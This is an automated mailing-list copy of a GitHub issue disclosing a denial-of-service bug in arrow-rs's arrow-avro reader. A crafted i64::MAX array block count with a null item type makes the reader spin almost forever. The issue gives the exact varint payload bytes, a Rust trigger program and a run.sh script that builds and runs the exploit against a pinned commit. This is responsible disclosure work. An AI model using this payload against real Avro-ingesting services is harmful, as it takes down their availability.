hibrian827 opened a new issue, #10235:
URL: https://github.com/apache/arrow-rs/issues/10235

   ### Describe the bug
   
   ## Summary
   arrow-avro (the standalone Rust Avro Object Container File reader in 
apache/arrow-rs, published to crates.io as 59.0.0) reads attacker-controlled 
array block counts from Avro streams without any per-call or cumulative cap. 
The shared array/map decode helper `process_blockwise` at 
`arrow-avro/src/reader/record.rs:2274-2310` reads `block_count: i64` from 
`buf.get_long()?` and uses `block_count as usize` directly as the loop bound 
`for _ in 0..count { on_item(buf)?; }` — no `MaxBlockItems` constant, no `count 
* min_bytes_per_item` guard, no cumulative cap. For an `array<null>` schema the 
per-item decoder is `Self::Null(x) => *x += 1` (consumes zero bytes), so a 
single 10-byte zigzag varint of `i64::MAX = 9_223_372_036_854_775_807` in the 
record body of an otherwise well-formed 183-byte Avro OCF drives a ~9.2 × 
10^18-iteration CPU-bound spin in the worker thread that called 
`Reader::next()`. A remote unauthenticated peer can saturate one parser-pool 
slot per 183-byte upload for the
  lifetime of the process, causing permanent service-level availability loss 
(CVSS 7.5, AV:N/AC:L/PR:N/UI:N, A:H, no C/I impact).
   
   ## Affected
   - Pinned ref: c8eba1a0b9e6c307109c9f69ac2aae728b4c8cd9
   
   ## Root cause
   The public entry point is `ReaderBuilder::new().build<R: BufRead>(self, mut 
reader: R)` at `arrow-avro/src/reader/mod.rs:1289`, which validates the OCF 
header (Avro magic `Obj\x01`, schema JSON parse, codec descriptor) at 
`read_header()` and returns a `Reader<R>`. When the caller iterates the reader, 
`Reader::read` calls 
`self.decoder.decode_block(&self.block_data[self.block_cursor..], 
self.block_count)` at `arrow-avro/src/reader/mod.rs:1392`. 
`Decoder::decode_block` (defined at `arrow-avro/src/reader/mod.rs:887`) 
dispatches to `self.active_decoder.decode(data, to_decode)` at 
`arrow-avro/src/reader/mod.rs:893`, which for the OCF path is 
`RecordDecoder::decode(buf, count=1)` at `arrow-avro/src/reader/record.rs:155`. 
`RecordDecoder::decode` runs the outer per-record loop exactly once for the 
single record in this block; the schema `{record X { array<null> f }}` has one 
field whose decoder is `Self::Array(_, off, encoding)`, so dispatch lands at 
`arrow-avro/src/reader/record.rs:1288`
  and the record-body decoding continues at 
`arrow-avro/src/reader/record.rs:1289` with `let total_items = read_blocks(buf, 
|cursor| encoding.decode(cursor))?;`. The closure captures `encoding = 
Self::Null(0)` — the array's `items: "null"` decoder — so 
`encoding.decode(cursor)` invokes `Self::Null(x) => *x += 1` at 
`arrow-avro/src/reader/record.rs:1167`, which reads zero bytes from the 
AvroCursor and merely increments an internal usize counter.
   
   `read_blocks` at `arrow-avro/src/reader/record.rs:2266-2271` forwards to 
`process_blockwise(buf, decode_entry, NegativeBlockBehavior::ProcessItems)` at 
`arrow-avro/src/reader/record.rs:2270`. Inside `process_blockwise` the sink 
read at `arrow-avro/src/reader/record.rs:2285` is `let block_count = 
buf.get_long()?;` — the 10-byte zigzag varint `fe ff ff ff ff ff ff ff ff 01` 
decodes cleanly to `i64::MAX = 9_223_372_036_854_775_807`, and 
`AvroCursor::get_long` rejects only malformed varints or buffer-EOF (no 
magnitude cap on the returned `i64`). The `block_count.cmp(&0)` match takes the 
`Ordering::Greater` branch at line 2306, executes `let count = block_count as 
usize;` at `arrow-avro/src/reader/record.rs:2307` (an unchecked i64→usize cast 
with no `MaxBlockItems` constant, no `count * min_bytes_per_item <= 
buf.remaining()` buffer-relative bound, no cumulative-items cap), and enters 
the sink loop `for _ in 0..count { on_item(buf)?; }` at 
`arrow-avro/src/reader/record.rs:2308-2310`
 . Because `on_item` is the `Self::Null(x) => *x += 1` decoder at 
`arrow-avro/src/reader/record.rs:1167` that consumes no bytes, the AvroCursor 
never advances, the trailing `0x00` empty-block terminator is never read, and 
`process_blockwise` never returns; the worker thread that called 
`Reader::next()` spins ~9.2 × 10^18 iterations of a usize-counter increment.
   
   ### To Reproduce
   
   <details>
   <summary>PoC</summary>
   
   inputs/src/main.rs
   ```rs
   use std::io::Cursor;
   use std::sync::mpsc;
   use std::thread;
   use std::time::Duration;
   
   use arrow_avro::reader::ReaderBuilder;
   
   fn main() {
       let path = std::env::args().nth(1).expect("usage: trigger <file>");
       let bytes = std::fs::read(&path).unwrap_or_else(|e| {
           eprintln!("STATUS=NOT_TRIGGERED, read_error: {e}");
           std::process::exit(0);
       });
   
       let (tx, rx) = mpsc::channel();
       thread::spawn(move || {
           let result: Result<(), String> = (|| {
               let mut reader =
                   ReaderBuilder::new().build(Cursor::new(bytes)).map_err(|e| 
e.to_string())?;
               while let Some(batch) = reader.next() {
                   let batch = batch.map_err(|e| e.to_string())?;
                   eprintln!("decoded batch of {} rows", batch.num_rows());
               }
               Ok(())
           })();
           let _ = tx.send(result);
       });
   
       match rx.recv_timeout(Duration::from_secs(15)) {
           Ok(Ok(())) => println!("STATUS=NOT_TRIGGERED, decode_completed"),
           Ok(Err(e)) => println!("STATUS=NOT_TRIGGERED, decode_error: {e}"),
           Err(mpsc::RecvTimeoutError::Timeout) => println!("STATUS=TRIGGERED"),
           Err(mpsc::RecvTimeoutError::Disconnected) => 
println!("STATUS=NOT_TRIGGERED, worker_died"),
       }
   }
   
   ```
   run.sh
   ```sh
   #!/usr/bin/env bash
   set -euo pipefail
   
   script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
   source_dir="$script_dir/source"
   
   UPSTREAM_REPO_URL="https://github.com/apache/arrow-rs";
   UPSTREAM_PINNED_SHA="c8eba1a0b9e6c307109c9f69ac2aae728b4c8cd9"
   
   _silent() {
     local label="$1"; shift
     local log="$script_dir/.${label}.log"
     if ! "$@" > "$log" 2>&1; then
       echo "[run.sh] $label failed; log follows:" >&2
       cat "$log" >&2
       return 1
     fi
   }
   
   setup() {
     if [[ -d "$source_dir/.git" ]] \
        && [[ "$(git -C "$source_dir" rev-parse HEAD 2>/dev/null)" == 
"$UPSTREAM_PINNED_SHA" ]]; then
       echo "[run.sh] reusing existing $source_dir at $UPSTREAM_PINNED_SHA"
       return 0
     fi
     _setup_inner() {
       rm -rf "$source_dir"
       mkdir -p "$source_dir"
       cd "$source_dir"
       git init -q
       git remote add origin "$UPSTREAM_REPO_URL"
       if git fetch --depth 1 origin "$UPSTREAM_PINNED_SHA" -q 2>/dev/null; then
         git checkout -q FETCH_HEAD
       else
         cd "$script_dir"
         rm -rf "$source_dir"
         git clone -q "$UPSTREAM_REPO_URL" "$source_dir"
         git -C "$source_dir" checkout -q "$UPSTREAM_PINNED_SHA"
       fi
       local head
       head="$(git -C "$source_dir" rev-parse HEAD)"
       if [[ "$head" != "$UPSTREAM_PINNED_SHA" ]]; then
         echo "setup: HEAD=$head but expected $UPSTREAM_PINNED_SHA" >&2
         exit 1
       fi
     }
     _silent setup _setup_inner
     # One-line confirmation reaches the terminal — mirrors the
     # 'Pinned ref:' line in the report README so the maintainer can see
     # exactly which commit they're exercising before the proof emits.
     echo "[run.sh] reproducing against $UPSTREAM_REPO_URL @ 
$UPSTREAM_PINNED_SHA"
   }
   
   build() {
     _silent build bash -c '
       set -euo pipefail
       cd "$1"
       cargo build --release
       mkdir -p target
       cp target/release/trigger target/trigger
       chmod +x target/trigger
     ' _ "$script_dir"
   }
   
   trigger() {
     _silent run "$script_dir/target/trigger" 
"$script_dir/inputs/malicious.avro"
     local log="$script_dir/.run.log"
     if grep -qE "^STATUS=TRIGGERED$" "$log"; then
       grep -E "^STATUS=TRIGGERED$" "$log"
     else
       echo "[run.sh] expected STATUS=TRIGGERED in trigger output" >&2
       cat "$log" >&2
       exit 1
     fi
   }
   
   cmd="${1:-all}"
   case "$cmd" in
     setup)         setup ;;
     build)         setup; build ;;
     trigger|all|"") setup; build; trigger ;;
     *)
       echo "usage: $0 {setup|build|trigger|all}" >&2
       exit 2
       ;;
   esac
   
   ```
   
   </details>
   
   Run the self-contained PoC bundle:
   
   ```bash
   bash ./poc/run.sh
   ```
   
   ### Expected behavior
   
   Expected output (the runtime signature pinned by the Stage-3 oracle, 
recorded verbatim in `last_run/oracle.log` as `fingerprint='STATUS=TRIGGERED'` 
and emitted to stdout by the driver):
   
   ```
   STATUS=TRIGGERED
   ```
   
   `STATUS=TRIGGERED` is printed by the driver's main thread after a 15-second 
timeout waiting for the worker thread that called `Reader::next()` to return — 
the timeout fires because the worker is stuck in the `for _ in 0..count { 
on_item(buf)?; }` loop at `arrow-avro/src/reader/record.rs:2308` spinning 
against `block_count = i64::MAX`. Stage-3 verified this fingerprint 
deterministically across 3/3 runs in 15.029 s.
   
   
   ### Additional context
   
   _No response_


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

Reply via email to